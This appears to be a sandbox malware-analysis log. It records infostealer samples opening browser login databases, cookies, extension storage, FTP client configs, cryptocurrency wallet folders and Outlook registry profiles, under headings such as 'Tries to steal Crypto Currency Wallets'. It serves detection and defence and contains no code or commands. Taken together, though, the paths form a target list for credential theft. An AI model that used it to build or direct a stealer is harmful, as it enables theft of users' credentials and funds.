                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite-walJump to behavior
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.json
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite-shmJump to behavior
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cert9.db
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-shmJump to behavior
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-walJump to behavior
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                    Tries to harvest and steal ftp login credentials
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                                    Tries to steal Crypto Currency Wallets
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                    Tries to steal Mail credentials (via file / registry access)
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeKey opened: Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeKey opened: Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeKey opened: Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeKey opened: Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
